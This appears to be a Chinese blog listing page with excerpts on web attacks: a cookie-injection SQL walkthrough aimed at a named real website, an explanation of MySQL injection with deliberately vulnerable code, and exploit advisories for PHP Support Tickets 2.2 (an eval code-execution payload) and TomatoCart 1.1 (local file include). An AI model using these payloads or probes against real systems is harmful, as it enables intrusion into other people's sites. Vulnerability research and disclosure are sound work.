目标:http://www.ytop35.com
下面还是具体拿个实例来给大家演示下,目标站:http://www.ytop35.com/Products_show.asp?id=284
,同时也是注入点。我们首先要检测下按照平时的方式注入,在网址后面加 and 1=1。
可见是使用了防注入系统的,但是目前我们是使用get方式提交的参数,那现在我们将“id=284”这个参数使用cookie提交看看程序对数据接收是否直接使用 request(“xx”)的方式?要更改成cookie方式提交,我们首先要访问正常的页面,即是:http://www.ytop35.com/Products_show.asp?id=284,等页面完全打开之后...
sql阅读全文
1.MYSQL 注射的产生.
漏洞产生原因 : 程序执行中未对敏感字符进行过滤,使得攻击者传入恶意字符串与结构化数据查询语句合并,并且执行恶意代码.
咱们先创造一个没有过滤的程序. 因为我机器上没有PHP,所以我就是用 JAVA了,我会详细注释.
代码
数据库:
create database if not exists `test`;
USE `test`;
/*数据表 `account` 的表结构*/
DROP TABLE IF EXISTS `account`;
CREATE TABLE `account` (
`accountId` bigint(20) NOT NULL auto_increment,
`accountName` varchar(32) default NULL,
`accountPass` varchar(...
sql阅读全文
标题: PHP Support Tickets v2.2 Code Exec
作者: brain[pillow]
开发者官网: www.phpsupporttickets.com
影响版本: 2.2
缺陷代码分析:
/classes/GUI/abstract.GUI.php
www.badguest.cn
public function getPageName() {
return eval(‘return PHPST_PAGENAME_’ . strtoupper($this->page) . ‘;’);
}
====================================================================
测试:
/index.php?page=xek();function PHPST_PAGENAME_XEK(){phpinfo();}
修复:过滤
sql阅读全文
标题: TomatoCart 1.1 PostAuth Local File Include
作者: brain[pillow]
下载地址 http://www.tomatocart.com/
影响版本: 1.1
缺陷代码分析:
if ($osC_Customer->isLoggedOn() === true) {
if (isset($_REQUEST['module'])) {
$module = $_REQUEST['module'];
$osC_Language->load($module);
}
www.badguest.cn if (isset($_REQUEST['pdf'])) {
$pdf = $_REQUEST['pdf'];
}
if (!empty($module) && !empty($pdf)) {
if (file_exist...
sql阅读全文
最新评论
看看了 貌似很实用